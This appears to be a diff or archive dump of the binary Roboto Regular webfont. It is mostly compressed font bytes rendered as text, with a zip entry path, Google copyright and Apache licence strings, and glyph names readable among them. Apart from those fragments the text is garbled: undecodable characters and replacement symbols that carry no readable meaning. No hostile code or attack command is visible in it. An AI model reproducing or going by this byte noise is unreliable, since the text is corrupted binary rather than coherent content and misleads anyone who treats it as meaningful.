+01353353353�����������l�'�!�/�ִ
+�2�+��90153#l'������q�rX��!�/�ְ2�
+�+��90173X���'�٘���{�{O����*��'+� �
+�3��2�'

+�3��2�'

+�3��2�'
+�+/�ֱ*22��22�
+�@	+�2�
+�@	+�2��
+�,+�6�&�
.��
.ɰ6���\+
����
����P��+��
+��+�
 � �#9�9�..�....�@� �#901535#535432.#"!!!!3267#"5O����;uB6q8������9p48{=��ᛈ��#�ά������!�g�`�x�+�	
33�+�2�
+�@	+�222�/�ִ+�
+�@	+�
+�@	+��+�+��+�+�+��

99015!##333#'#g��^=t��n]�3�^RR�9�9�z���W��g��881!88���-��+�3�+�33��2�
/�
/�3��2�/�ְ2��2�
+�@	+�
+�@	+��	+�	+��/��+�6�&�
	.��	
.ɰ6��M�+
�
���	�����^+��	+��
+�	 � �#9�
9�..�....�@��9015354632.#"3##3�սC�X"5x?ug���I���u���hlu��X��X:��8'-s�+�3�+�3��2�	/�3�	+�
��/�ְ2��2�
+�@	+�
+�@	+��+��+��	99�
�
9015354632.#"3##38���"E*3VT����������
�gb���X��X��8�-/32�+�-033�+�)1$3��+222�"/�
/�%3��2�4/�ְ2��2�
+�@	+�
+�@	+��.+�2�-�(2�-.
+�@-+	+�.-
+�@.	+�-�!+�!3+�0�0/�3�5+�6�&�"!.��!".ɰ6��M�+
�"�$��!�����^+�� !+�$�#$"+� ! � �#9�#$"9� #$...� #$....�@�.�	99�0-�9�
"�
9��	9015354632.#"3##!5354632.#"3##38���"E*3VT�����սC�X"5x?ug���I������
�gb���X��u���hlu��X��X:��8�-/3��+�-033�+�)333��+222�
/�"3��2�	�!122�4/�ְ2��2�
+�@	+�
+�@	+��.+�2�-�(2�-.
+�@-+	+�.-
+�@.	+�-�0+�3�5+�.�	99�0-�!99015354632.#"3##!5354632.#"3##38���"E*3VT������"E*3VT����������
�gb���X�����
�gb���X��X��Q�C�_<��
Ρ�
���a�w������a��D����P�F�r�h�@gP���t�N�01#$�R�q���a�d�7�����M�f�S�
cG��0��=)r.�vE�����tx��C�jB%�R����tq �tqM��f�"j�6B��a(�N'(X=��Rfj��?a�b;c�8�d������������a���b��/m�"��.-.^�?���o����bk�F�h����^��DX�x�bq1#DX�{��Icdwlp�����?��w-_�x�n;������r......���v��������C��C�C��C��c*��tqtqtqtqtqHXtqj�j�j�j������fjfjfjfjfjfj�:?a;c;c;c;c��������H���a�a�a�a�a�G�a�����������h>a�����������BB��k1#1#1#��|��P�P�P�P�P�P��d��glgX�@Og8t�878�8,,,,X�t�8^���.Rp����
V�b�D��		$	F	\	�
�
�,��B��

N
�
�D��>�&V��N���
 Rt��4��h� ��L��V�j�"x��V���Pl�>�"�4�� < \ � �!Z!v!�""f"�##b#�#�#�$$\$~$�%�&Z&�&�':'z'�(L(�)()�**H*�*�++F+v+�,,�,�-D-�.0.�.�/H/�/�0"0z0�11x22�3B44�5h6 6�77�8
8�8�8�99L9�:N:�;;h;�<`<�==n=�>0>�>�?J?�@8@�A$ANA�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�BB8BZB�B�CC8CpCpC�C�C�DvD�D�E�E�F�Gt�FW	>	V	Z	Z	Z	,^	�	@�		�	�	&�	
\	Tn	�	��	�0�Roboto Regular WebfontFont data copyright Google 2012..Version 1.100141; 2013Roboto is a trademark of Google.GoogleGoogle.comChristian RobertsonLicensed under the Apache License, Version 2.0http://www.apache.org/licenses/LICENSE-2.0Roboto RegularWebfont 1.0Thu Nov  7 15:26:50 2013�jd�	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a��������������������	����������bc�d�e�������f����g�����h���jikmln�oqprsutvw�xzy{}|��~����������

�������������glyph1uni000Duni00A0uni00ADuni00B2uni00B3uni00B5uni00B9uni2000uni2001uni2002uni2003uni2004uni2005uni2006uni2007uni2008uni2009uni200Auni2010uni2011
figuredashuni202Funi205FEurouniE000uniFB01uniFB02uniFB03uniFB04�����K�PX��Y�F+X!�YK�RX!��Y�+\X� E�+D� E�p+�+D� E�p+�+D� E�t+�+D� E�<+�+D� E�,+�+D�	 E� +�+D�
 E�	+�+D� E�+D� E�9+�Fv+D�
 E�+�Fv+D� E�
�+�Fv+D� E�#+�Fv+D� E�!+�Fv+D� E� +�Fv+D� E�+�Fv+D� E�'+�Fv+DY�+R{��PK!*��a�aDit_sanctum/fonts/roboto_regular_macroman/Roboto-Regular-webfont.woffnu&1i�wOFFa��@FFTM�g'
GDEF�),��GPOS�M^�>�@GSUB@N`&� �OS/2�W`����cmap����B*cvt 
p88
�0fpgm
��eS�/�gasp\glyfdLv�蕗�headX�16}��hheaY$�DhmtxY0a��|R�loca[���m�K�maxp]`  �name]��&���1post_���-�prepa��1X$webfa���R{�=���G�3Ρ�
x�c`d``�b`b`f`dx
�π���9�K �,�S�xڭ�ylTUƿ7���L;��"5��P�,Ę��,"�DMԈ��������$�F���l�T"b�V#.�(Bꎥ<��;�߻3��Tߗoޝ{�9���ޑ')WWh�B%�n���|x��+L���7n{��=u��-ǰB�C��*����=�KS��zV�*�z��=�MW�7Ǜ��>�~��C��PIhbh}�&��C~V��P�]
e
��a�?��qj�����������bX����k��8��Q;�k�O�A��9�4�`���c��"��>R<�X��!
�C�08����v�c�V�tl��3�L8ΆK�����p\��2����p#|�
߁��f�xn���
檄2V�Z���d�8�t����kN�;5S��g����*��Z�`���N�zwлC��U���4���4��N%Zik���FQ��y�'ݡ��'FO��C��Ƃ���KF
Ѹ��=�D���lk��_�s%��j�}��++��=��R�*\[��r� ��B�����eojٛZ���Ͱ�{\
�r�W�vc���x����ǃ�kkkkkk�J�c�~��jc6CqX��>X�8|���'�8|���E$���I]�U�t���r�POF�"�������4Zc�q�&j�����,��\��SzZ�h�^ЋzI/k�_�J�7q�%�P�������q����n�o�m���J�rٯVk��X,>��e�Yg����~�~�ֿ�H�e��3�P��Z�]p������S�W��4=�x�������&��y���=�g����fo�Ǝ-Ͱ��
v��.&��W��!�1FV�f�/X��o�FN`%͍|f����x�S.fGl�U�-߲��
����]���b�[���Y�˾�w
��6�s�UumS��ߨ;n����}e��o'Y=`�ij~���a�yccռROM��yƉ�D+��R�5�߆�l���ڙs�hS�U���g�Jy�G�&dl�Y�O�~�#M��?�B��������F>lԩ�	W̩u,S�1��3�٪�푦he�xS���$��J�u#�m���=f������?�f�ѭ^J�+���ψm;�Zf�l���;��0���4��f���v�
�vgSᅮz;�
�3�
�3=���h�ox��E�����H���+_�n �KtiP�l��ݩ�/9T�W������Z�/���ߏ
�?��� �Z��9������?����V���p�����HPH�0Zm� ƪ�ƃvTh��SE�e��""��ϱ�� ��A3��j�ZbZ�̾
��/g�
��6j3V���

�B*iW�����}�S
�P�/3Fh��iu_��N٨S6J��)�lB��S���.A�ԋ�ޠ�S��S��S0�)��)���u
�;�Pn�
a�Zĩ�̩�(֭ [���`�)��)w
��Ak*�٬3P3�TK��pڵq��:�P�ρj�Z3m����;��$�!;s�K�2KP�yNͨ��R�F��Q�o�4U#MCN�,�f�,MeeO���(1���2�-F�|�5]�����\��J<��")v�\K�4�U�7��g���3XӘ�n<4x�c`d``�b�c�a`rq�	a��I,�c�b`�3������s2�8@,0f�1E��4�3& ���b�
�x�c`fQ`�����:�՘��QB3_dHcb``ax���>�A!�T�����x����Kc`�(g
V``�����bź��	p=+x�c```f�`F��1��,�����d�2�1�gf�`:�tG�KADAJANAIAMA_�J!^a�����,������[�U͠ � � Um	W�T�����/����W�?8�`��}v?��`Ã����?��)ԅDF6�F& ����uV6vN.n^>~A!aQ1q	I)iY9yE%eU5u
M-m]=}C#cS3sK+k[;{G'gW7wO/o_?�����а�Ȩ�ظ��D������3�-^�d���+W�Z�v��
7oݲm�=���c(JIͼ[�� �IYC�,�b��r��rjV�jL��sk�%5�N?t��[�����p����=g��y��������ľ���̙;���B��* x��u:������������������������Dx�]Q�N[A�
��� 9�����{�	�Սbd;��i7r��q@�D
گ���H�!H|B>!3k��4;;�sΙ3Kʑ�w�k�S�$����6�NH�����덌��Zlf��u���є;j�=o)M;�Z����
����;�4���:	�!�qK��ͺ�����b00����.?�R��4�j˰��Ѽ�3��4@Skm���!��qK�˦�6����$���tUS���]���`�*́��Vy&ҷ$�,
�b���
9����@�HƼIJ;ㆵƑ��6O��<�Mmo�Y�w�K:�Ȇ�b;b)�	DBFU��Ͻ,�R��@��������D<��u1Vz~���ˊ�V�΋Bwo�j��)�^ξ���Ac����J��<,�4hCz7z���ꈫ�>�'ӿ�Z��xڵ�	`��8~��d���,M�6]iK������� �
���ʎ*�( �,�(� ���:�Dť�<�>�)�Ԫ�}OK��9�NҴ����m3��3�,���HB�+M#�H̤J�$�=j�2��d��ݣ��D�	OG�r���Q���J@)(��B�^D7�SL#���/�E�d!t�Ie�
�(��Ш�)jHU-AU:���f�7�{Ѭ��h&��U)R�)\��JX�u�@�o�O�wOV�u�I.a��NL�Nz�U9� ؈E�P-!�:�*=�IpYɥ�i�f�K;�U�+�"������䩃���0�x���Gr�L�_�����7��B��,�GG�h&���e���@�Z�8n 4�쬨��"X#��z�?=��j��G�+7?2�G��意��T3�h�&5å��*}�&�������c�����,�>75|f��gf�Z��\����i��B휹��;��%�
�ޞo�v���z!�쁻��2��[�[3,p�檷��=x�z��_p��
����?��U:�+�fV�:�����w�s�����bo� "�.q����W���;	Q��',�O�W�~
=�S��C-�O�}Ѧ��)�������1l�S�6
�'����[V�����q��Vh�>�n�8�G(�s�Z���HG��Dˁ�j)�Bn�����e֊�U�a-N+YxZq[�[+�j�-x��Q4�դ�4��u6�ex�x]��Ҋ��V�(�vsD�J�ݔ(�G4�ND��eR�9)�"8�����C�kkJJ�hmM�:���WXSRX ��i~x�;��*:Gxq��[�\����/<����^[8k�7l��
�vL3mY�`楋C=���;�O>M��Њ�L?�s���w������hʩLKM�ĉN*I7��D+p�v27E%���nnj�RT!9+�.p��١bn�j��J�h)��).�������UpX��j��hDW�⮷K�y���*x�ST�o�֥��ֲ�"-]����b���P�\XPRǰӃrtx�����)�\�Ѓ+V=�����v��&
�όE�؇V�x�����7�Bi�EO>�xȢݻ
�<i�AS�:�!��wb��C=�Ģ��w�^<x��CM�2��T�}���[8*B��hJ�<D\���"��D@QW��;���x���őڤ:8�|�MZ7x���7ĈZ�4X��\���V;DT�<������K��N�CdGzY5g`�6�`�TJ{��0��\X�B�8��9�z����s���kV=��]�L�<�/�R�zN�Lja�L�P?ոv���=�MFw[Թ�H����+n|��[/z���OX7x�>��Q�>��3Ӥyf��NU�>��M���[ri�cf�}8LʣiL~���F�m�`��q��~���CEe�"���g�7�Z��N�6�J����!Ž4	2����QYP|.7ࠄ,�=��KV�qxU�����p�������M�;�;����͸B��k�p��k�G4g�;��Z�PZN#pyb.�����-%򓴗�򓲾m*��^ᤗЯ��qE�]}�U�>��l���Xq$��O@ŢBL
��������fe�b���1�i�'��`�a����//ݣ.; �\C/����K�_��<��
�{%��iВ1-ik�Ҥ�BQBQ�<J�(�@qڎ�.���E�6��j��٬x��@M�6(̀/�*C�F�N��(\���F�Z��O���n��uq;�n����4�
��'�u
�L�)4��+��hTl��JA�Њс��X���~/dnق�~M"��o˒���^�F�����;ƿw�Z*���0{�VpW�=?
S�0��؎���c�1�g6��!O���o��qI����2��,3��9�t��R��]q��!w\��@��V�m��#���7�Z�d��%KV�R
������ޤ@����_��^x������Zc�*WDW�� �+�,CET����
���ҟ��v>>L��9l��5�\C�)� E���� �]%-�+�:.f��d���/�N`1�����c6|��P�Q�nc��xQS#j���'�C	�R�L����4.�|��MT�浦5��[a��a�ţMݴ�ɺ��h�~Z��5mY.��=6j�ƭ�9�]y���RN� ��	@0u�e��l���xΛn�hp::d�*t"Y+�����<�T�YZ1�YA!V�Q�(;�g
l�zSvA�`
h�8Q�
��׭e�EZ��C���Đ�f4$��W���,�y���w/�y�
���`:v���3g.���x�u��Q�vŊ[�/޲�,�%?���_V�xv��_@�]/^��T2�D�qni v��P%0p�&U�T�GTG�XCQfe��������iD5��vV���'��\',y�С��t��î9�u���a[�]4�h�
��֕G^%ќ�r4r!�<RS}J��R��縀<~��YکG�]�$�B@�"m2�q�Y-ɤZJj�!���TBc��#�.@ڤ��T�~ج�g��^�����)OE~��_U(�F�ꭢQ���
[�YP��D�LE����)@�(�dFZ��i.�#�=i]g����d�]9��U�\7%���‡����f:��_<�;�A��T�gu�91�)}rA� �qT��0��2�Uۛ�d&��#�r�r�i��(�87�L$e�H
�Y.D���k ��l�t4E|�f1#$Eh�"�[��iw���*)�9�DnN��
l9�&2�$��v�v���N��R�Ǿ��oѿ{m����y�Uk��n ������2��w���/��hgj>��[���{Q�C�R���@����a&��M��j)�A��R�Y�RT�~�f�KQM��e�	8F���n3Y��!RW��U`��f��p](ш��k\�A4�eR��C�?ϕ�]忾k�mݪг�G�m���\Xh�I@�L���� YL�>�PV�t�
�|V�P)�P�(��Q������r�>n8t�T�.�����u��ʋ����
�2	����$L�����Z��r�t�1!P�(�L�Iw-�y�?_���7���=��hܼp���7,��l�)˖O����Z��c��9����sv�wܷ���}Ӛ��o�"�_s�m��X����ŀ�̯���d�,��\��4Th3�f1�x�5Č�L���\oS�t�b:9#j:
5��n��:�+MK`ӕ��R�D��l��:��Լ�kjֿ�ǐ�z�v[t�Ot�p�{�i\s��;�7���Y|�(M׿�K�+����My}����w�s�—^{ae6�ԙ�F*��fX�Mba�D
�.)�,k�2�u���8m�Ls�j���XIz\3�elAU>�Rnщ!-��-�-;��W�Ƹ�%]
��\2R�'~W$ �}&��o�+V�:b���n�7jr˞�q�m��ďģ�Ln�I"�Ad�ۄ��f���žt�C�z���p��=�j��jK���+�KF���G�|�_��U���p����2~�%Ws�K˶ŭ�����l}d�8CZ���:�9œ��,4<\i �U��)Vf��e�����%)��n6>�=�Y?Zs]g#��4q�쩣��	;^9�pˑY�/}�˯_x�9ǝx�ws�n�k�M`��#�q�����\p��X�35���
�f�*�>A�gnR����nx�J��.e»A��<��b��Q쥨=\j� e����I}fV��(�h∩�R�A�` ��ZE����SmW���[3 B��G��Oo�5Q�&�|"ʨ���Y�)��(��Ŀ ������J:�y�Ƙ�o����Q�~��y��;�ݼ����S�䰵Gx�]��_W�7���n:�v��gI��Lԗ��Y�>�zO�H�̌�ݼ�~JܺC���������רH#5���3W_��St!ݥ��5�
}pE��� ���Y{W�^�,���H9���b�c��#߳�ȵL�l!D����2	�-@�
��$���B�q��Њ�U����M��at��R�6��i=����N4$C*HA���Q
�٭�0���*�����Q����Dv��ʙh�T�S�]��R�BR��/p���4У_Sᦫ�m�c�����y�����z����&��q�=�هo;�ޖ[o\�~�
3�^�{y.���a�1$ q� ߔ�A�R%<�jǍZ�@�����el[KH+`2<C�IM��D��Fg?�G��E���u��
��>�Y�c.���k�z���~��Ꮋ~�C?$\��c���e����{�~�u�w�^�$�m�G��t��6�b�SŃ���c�ͅ��'>.�`x�J��Ak�Yk�/�\z������㇛�7�����u{p��s�mj�2�}#��������`�g��"��;s��ګ���
�;�A|>f�Ʈ�Iݪ�m�������̽�}��i1�{ZD�cں�qC{�6���asl
�̶5v��|��W��<�%��Ap�`ⰀÕ��+�d���b�5�Ls(�Ƃ�iࢱ=��n�rA�e)�쓎|���f&٬��\�Dp�I
lE�@Hͧ=O������Ï���z��eA��O����w	}iGj�CE^������[No�}?�6:���D{�ðQUS��&2�ښ�hgy��C�7o����K�&@h��jcc��I�]-�?>LX����E����-I�k'�W{�
#��}�~�փ<���R~��]
��}�����k�L���`8��d_�Ғښ��+o�����wo�Go��ߺa��s�W�1}�K�M�L�qfmƙ�d8g������D'{*�>	B��o��BZh�,X?coc�b����$,3��|&���5���x�!��N�8�"�xє�0�,���$�?�$d��N@�\*����&U���̘٥��-�d���ЪZ�z��p�>��0�F	��0�AJ�?<����=J�I��L�9��5����&p�O���~�-�'����X}l?i���Ƨ��	�)�U��s��Z�i�5�L��J�]_��_���;q� M8>L�$�����LB븙���E�
���ob�V�� �o6�ENQ���sJ����|�w�Ŵ��N�������~:���"���t��S� 1�,.�!}��"����񣵥:��P#�bL���ݔ�W*dЄ�*�����L�ܵ~�}�I����{V��nx���M�W��CITA\���E\�x�,)�i�C^�EB�֢hv's~̸ �$��
������]n��>*�:��J����O�S`���ns�{!�4#��4Q�-�Lt�Bj&���B��&nx3��w(�@en�d1{����C�i~�{�0jA�ԟN^?k����7J�V]����ݰn���驿��H�ҧnY�FAz��sn�{Gl��^�d�r�;�ӯ�T��m�1��eùl�e���SŲ�yH�xv1�����5�?҂H�<��`r(�0D��pf���')���r�%E�5E�?�7�ID	Ep]�$a�ۛ7>y�K��1��+�������|雟�Ͽ��)�&�^�pƕ˫�<��륋Ci�[��]T��!���k_4q9W�\�ld�rbw`�P1�V>�� jb�^
Q��_e�6{��W(�f�1xr���]�c&G�H4�+2Y�%�(�̢/�� (8���2a�Ya�cC�-�ި�q�g�}��x�d�ûv=���:�p�\ǘ-0���)��aF�F��8P���uh���r��?��� �^{�t�XJ:�>�\�G��q�hJ�+
�
T6�p���1�(D]�����t/�ee��۟�P��{{��gy�R����I��{��}e��a_O������������5t�T�~��t�)�E�G0Y�.�����$�-��T���k��׈��dU�w��QD��QHKʹ��k�fɥ�$uv�s>l�w���r���jRO|�>#>{r��ϋ�&��t���C�G�.*1��%�ц.➖��F�1]c���B+�K���~����C��?���
��
]bU��o�E��u��pZ��mE��5���0Kކ��i8�� �p/
���Do�B���!�-|}r�N'�̑�d�S�q�V�4g 3����
�2+���|�E[�����M�Z/-ݺ��<îX�\�b�o�D@�`�E�1���إ
��`��߉��VS�P	���[������zl�V�n驥b�x΋��y!IK�
��c�w�A����'[��A���G�v
2�����r�_�9��v���t��p��d�r8{������6Xs������6Z����zP�P� VF<��
~
��$�>����${����ĭ'����"�y�=�s	$O��6����aWt���R�^$~��v�K��;�i`G�&
�VE��.���J���,����1�A�c:A��1�[;5�4��v�)���A3��A�1tvE�(E��W��+8[ß�u}j���W����Ա`HE?�B#fc�=�;�N|p�ic��f�}����7lvZ�Mz\k�l��ݙ��[G��>5}�5�˲�1�Wct�Q�ip�ЩO�5p�����@vW��@�����:>0\d�E6�ܚLQ/�3��Q��`�[K7
�0A��Eua@C�����'d�Ib4�Y�A�R�Lj��ú��~�E���5�E%�ܾb���7������O��׿���u�v�e����ƞ�����^l��ml#�elC��6lYF����G�%ېͲ�@⇗�_O����[o]v�@oZ���ゥ�[Z;k�6�I�x�g�?��
�d��)3(�A��p�۠�Lnss��4��4�M$KK�pb���z؁B� �L�%r*��]Q��΢�����k1���G��49Ԯp�{�g��n�i���2�獷�5���k���Q�}N?��c��z�P���C���c�.��y��	�I�Ɠ��q�89A�z!����6F�� 6����Ӌ��Y�\
�k���jU���pX
�o��&X��b�g���c}Eq��+7�
���/��#��n�q�j���[���ӽ�"�ő�i%�kʼ��G�u�ɕďY�4fO���UO����~zPMc�>����*�i>ƕh_e��qR��Mbe�y�'���)�.��y�`@y�;�}��/�h[��춻%y��O��q�+��b�C*�\#���J9�;�Lly1:ڑ!+�r]̒)J��لi�J�d��� ��%�3I`A�!Z'��|͜Ib�:[h;�c0֕_�|oM��_��g@�����XZ{׸׿n\����%7^�f��b]sb�;�Uߓ[�����M�p�u��?>�/�v��C���-�eY*ʲ�fY�M�}!���n�1���=L���'�
�\ �y͇YY���O��x휋n9�s��w��Lx��C���������jy�)r�Y$��X����Q�z��C��N���s�e�0�"5%�آ�w5�ʝ^�.NPw����O	0��oJJ��gH��{��o6�Wl5�GM�6�����|��q{�6�� }�m?El'&��
�0;�\]���ݐ6F��BZ��Ѹ�v�Q_K�N߱XN?9��Խ�(�Mw�}�q�M�A�!����c�q>��a�`�a[�21��[�Au��<@�/��p!d!KG1�6�W���T�c-��Q.I�ZV��K��x%�kԔ�g��Z~l����y����]v]��u�W^y������ ������-������w�3�o��=e��w*d�$�f�bm�@k����jJ��<��q�u#��J]w\2��#�£��_t����A�J尞�j����VIv#bB��*% �[V����g_P�~����w�[�~��5w
J�ϴN?�Kگ�����ݟ�;m�_��2p�>N*�u���f
z�	T�UI0�p�A�%�4��0�i�2����4�ܦ��K�4��M�)�v��C�}�x���#W�q��q��V�HY?�6M�~����~��z���?��c0L�lj�0\ex�C��Q�����9.�=L�#$��
`Q��r�����Pe�6�Ļkr�n�Y;l��/�����֬0����r��h�1��P�㜟�7�V�	��"�$� ����Ī�x挕�K�'࠴�Q����j���ά��Nϑ�n>�,=#�n9���	v�!�g%�0ڌ��M���j⡟���+�V��x�'�_�1��6^>�v�Lj�����O�:o���?oxa�t*�7a��V�u�i�_�ͦ��SǏ�gx^ņE���b�,��ξ�O�A97-�#:��e��9��0���q$�A�2�~pԙ�b�kM%;a��Gi�Z�4kK{����`��W^6�y��[%�J��Ʒ��U���2�FT�_�
���cל��"/w���*܉k��tR�
2m8ߩ<|*���$o�$,�v�2K�))�TTf���S]´-��qҌ�+5g�����OX[�ĒCElj���%��
d�װ.��0bL4c¸����f�	�Ô(���!}�F�k�t��‰m*	1}�aLcMjJ�]Z��?�1����xpHr�`����O�%�����G�n�����C��"BbsD���c�V,M�ba�k�~9���?̓sv���ﯕr����-]*��a���†g�3��$���,-�A���,���N�w|��7��;��/�Y(��l�.���ޣO��g�-��U
��7�1Ҡ��
�2�1�4%*��6�I���#�٠���B�ڎꑲ{���z��eБ+�N'�g>`7m���1�^�-�E��΋�(�c�0{������^�]�}r��{��ϋI�V��5�`a'X�L�1�n*V�x��F���O1�;���LNn�3E�6%�dă�fc�5m�C�v������;���d!oÂ�o���=�ޞzeՎ�o-�/�[��ηf�����+�bQ٤e
���~��l�����/����΍Úl VPKXS�
�Ͱ�GT��9�Y�½
?�%�5
�����a�@堡�<s���9�1�̲W�jƌ�~��eoM����o/�Sx}�O�ޞ�`�ͳ��s�w1�S�Y,$�^0��R��&"�e2��.1�G=M�n��&�XA�+�<�V��W��Έ�AU����I\�.޵l��#����;~͓K.�0�ۄP���/8'\5g�{�ᾃ���
���*:�}؅h��f;�o�1|�;���Wa#����o��O�Ř���Y̊�4	�L�U�$�g���QOA�,L�� J^> ]DK����!U���3�ij���^�J[GV�X�U�0��=��$
���JT�?�����uZX�g���aj��x8��h�?�ij$d!�f|��1�"65�-;+T7/�����ٲ`.�	g�
�|s潠�3_@��� ���VB���J�hr�a�EF�8�>,40́�pOZ[z�v��~,	/.�0�:}@�(���ѓն�jY�����������9o�ݺ��m��|m�F�SN��t���d���&���p�j%�e�W�JG��T�,Ǫ�T^�Z$�C��B$P9�ʕ]��i�z���F��<�N&�T*�uO:�����^�7͕�v[�����2�l�2Y&sʪPm����
���~��5��굫o��UW=7x��_v�嗝�����='���u=zvٸ����]5���u�/�ٷO�e��?�u�^j����5���u�~"�Shp))ĉe���P���N����L� ��$DA�X���NVv���P4ʼn�R\��b��3%����K�}<�j���N�S>���.�-t�~K����h�I�M6�B[�oՏ�bx�t�d�%Foin�=�>��;q��*���N<(���k���&�a2�<@x�3�n
��'T�*Pŝ��P�j�B��5Q��uroY���Up\���%ߥ:�T��;F˵sQo�(#C�'���6��/���ڻ�O�[K�Aa�T(�eG~I���Z4��CRb�$:0��ѽ����:������P��1#����ϛ�$�����������ƍp�����}//_��7��qŻ]�p8xq�y�	��ה�n�ȡ��s��=qb�{���Cxńݯ���,�[>o��z��[��nJ��;q�����+�;�����:�x�Fl���yل��D�uYE�#AO��Xp��艣�w�\mԩL_�^�Oj�6n�j�f���gnjWX�R;�*�H݊���!���͆�E,�\���@g�Iqx0��6v:oU;��}���]^H�vin^�
����͚����LJ��w1:"Y-�h�`�cx���@L�� %F��-���G��	7Б���������_��&	�G�3iҘї�$u���i7����F�5}(����]t�R3��߭�0�#�7�cG��3��՗L�7m{�4_h=����\Ox�,�ܠVdnR˂
�a���ih���b�'+HQ���Rq����ݕ�v�׭�����2�G$>8�7Q��i�
Ғ3���?���]����_}۽��'-610{ȼ%Ot���^5�bq���kz����)OX��6�@hT��:3��ƫ+��^ݗ˖	d�8]�@d�d�a�/h�]�ȩ�J�Wz�Co�g�s����Et���X@L�:^m�ld.�i�l$��
��"����T���J-�D�t#;��� �cWu'�+:����j���>�L�S��
!�pH
��gL�iEp"'�vIQ�M�±c��)@�)j>0@'�F԰�����Gݰ3��-B�)���4�D\ms��l��q��雟�۫o7����o�}����`��6v��F�S,�m��/Z��瘼�i�����|�w�_�����r^7��S�x>�m��e���Ar��@��)w�z���K�ͰאN�H�4�T4b�f�H���OB.���IV1b��4�4�־�t��o�:y�]S�mZz^m͹õ�I��m�:m�ƍ3���l���$�!��J%��ȊM�]�LM��D�n��v�Ӛv�c"�Y���-����Oxqݪ_�E�H���ٺ�ٰ��a��$W*�n�>����N5%�e�4�w�2�����[4S����9O~l��͗^w�@��TZ5�cD���W/�nج���%K��}py�g��w��N��t�������4'�k��1��Q9�k3�ޤ�{3%�{SU��HE��dz�uS�4Z&˫gc�D1��=�jqs��w����>�胃{
~�y˖��sހ.���ع=�9�a��=��*ҭ�gda���kuy̼yW׍����M�!�J�E�f�#�
���MD�!��,�ӥ�}#�J�S����kݣ�e��[���D���y�Ǔ[��"f~���ZD�d�ߥx#F̌gO�cf��=�	�\9�F��q��gv� vla�爥'���7P�w�q
B��.�Ψ;�M�v�� f�͒Ky�^p5~伃��}��J����MzL��/�t|�`�"��a�,�o�������z�q@������O�Q*���4vSj<0���x�Ms�x�C�+n������f]�`�yG
�������:U�����/6n��X��������ų#S�ԑ��=�V>i�p���߄u�V�+��.�(�5���bjξ�6g_Rۨ�=�̎���m����/<1ꒋ/�l��Q���矿��=�q��i#�>}�p��W���Rq���>pz����
������Z�N_��$Po?K��K���7�%�nu':�n��,�r��e~88b��y3Μ�D��Au�i!M��5��*h�����f�1����>���@$���%=I�sZ�y'�e�WX�+��g�>�|�Ʌ�'.ܩ�}�7�i*�4;���0Y!Ǝ-ټy	�LӀ{�p�Ǎ�`��
�t���}>s7�Z�\��E<T��2�Hy�X(i>�%vV�k��9J���0L䃈�#�6��νFҍ=p"��}��8)�8y�m�
;��D"����T��ۏI��Α�Zֺ[�BѮ�@��3��d~O�&�j��W8j���[H��u
i�[h�hv���AZAU��4t�Vwe8�$�s���������y+#��NKY�`������&#��T��L�,��
�归s�]R7�94=�oY�ئ5��tĜ�kt~6�Eu��O�w~���>��rb�]DL�*Q�+�,Y,�*���5���3��#t|-�F������F���+/�5�[��BS���o;�?������=w�H�w�rH���_	�Hd�����"��݅�xw!�U� ��Q'����Ql�e�
��In54g��'%�o���z]g�jLܴ��F��C���0�%��xnW��;�����4����.�/�y��[[����
���ώ
��%�,���2���Q�����8����N�n�bj�OO�Y*4��W�Y�4dq-�
Ku���>&��,,!�*��N}8�
�[3�@��w.���t�jI�i��=n�V�;��c5e�g̻��-ኮR@/�b�>��1K��Su�#�V2`u2c
ϔ��:�Z��+�Ya#)!������C�<�^ɂr��ĥ�4g��F&��Ra�&2��\\��G�p���M�<�X�j�n��0�]�*5d��`i��9piH���T�DA.�=����LL�m�HpDZ�x;.^k���
#G̟w��&��(�޽��g�<���qɌ�T��VYٳ'N�H�y<خH��$�@I�e�g�ˁ��X��ӑ��w|ԡj�ЧÅ2B����VG���<v����,.�4ú�$�:� ��3�?8
��^q��zl�W{6Mx��-����N�<�pVm������က�y�>����Jr;�l(f4i��S�6�pUr?'�rO�Z�h�Lw��f����8$OVnQq%�h%�LZ炴.*-i�9�w�ٓ��c��Ó1���4�heT��aZ$%wK�߱e��%����>l�<���#���7z�nY�w��;z�%@�'M�n�X������^�*!���V���e� ��\��?�2>��^*��e��7�����5C3~�Z���?[���֒v&��UH2�r�Ѽ4Cw0����4$��?����Sg�8=�R�V��
���Bޞ�j�O^�GOm^�����O�xM"Բ&�m0��*�n1a�q��b��D���+�DS�����Q�}�;��-���pݲ��ք#l3Q�d��+�Tx�	㠙��_��H���2�
�Ʈ��1S����V�(	fc�q:b!�ӯ�@�p�^��5��ހ����V�m�Aô�,a6�����&'Ex3.krv��1���D�V{4�@�Q���\8
�w &+�w�����<�����!:+�L�K17��z)l�h4���l,p�d�ݭ�b�y�!>j��*�İd��ǚ'�}����6m&F�tј>��l��G[��Қ�:�Ռ N���vg �5�F���^ѐ�up���!��KknFQ�g�P�z����%��D�f(j^D�f����.��j,n�rjn6�ZM-��[XMl��^ds�Y>��f7r��JӂV3N��!�Y��v%�½w6����o_w���u3y��i9��g�r�mc���~[{Q;k/nk�%Ik�?�ǥE�뿈���Z�	C;��?��?Hnlc�jYP+��ұ��J�)1��(vG��Ԇ���X��(��jW��2f��I�!��@Q�#|ۤ]<���5gŊi-��d��/\���c$^~X��H��7cE�s��X��,����X��Ά�\y�sGФgE�S\�R2�|!~!��x��Ί�)�������-���s��ҁ���t,J�.��鐅zT�.���
��0	��RL:a�5���1T��J�g�D �Gc5�:*{̊W�+A�8��)��~�?����v�؆�<�$������7XSX���(��0@��}%A���<>�ˆ�@č��{��ۇ_�XR(����~���z>�A W�#1\���_���X�a��\5b}
�*�x�]_P��:��e���x�($
#孻�մ +�9��;ݨʍ��}�H���L����im�r
�����e���V��z1L��l?�I�Ӗc��l���d�����֓ݼ��v���-��?\���Kㆱh��	k�_���A5-�ylh����%��]���3,�_8���|X�'��l��[��m�ǧ/�
�i��m�;Ӊ��-��S]ߩF�wT�:Y,���o�6kn�vvms�$7۷�A��x6��G'��
v�ñ���y�MZ��I�����fb%Ȭ7$��t�(���;*�'����
�O�ͤ�G|�����{�Ξs�^	�%{H)v�U��N�&Kj��Xjg�P�]M�6s>h�8�d- f>l�i�b�)�,y=��Ϧh.Ĩ�U=�P���^cdM<���_r_m
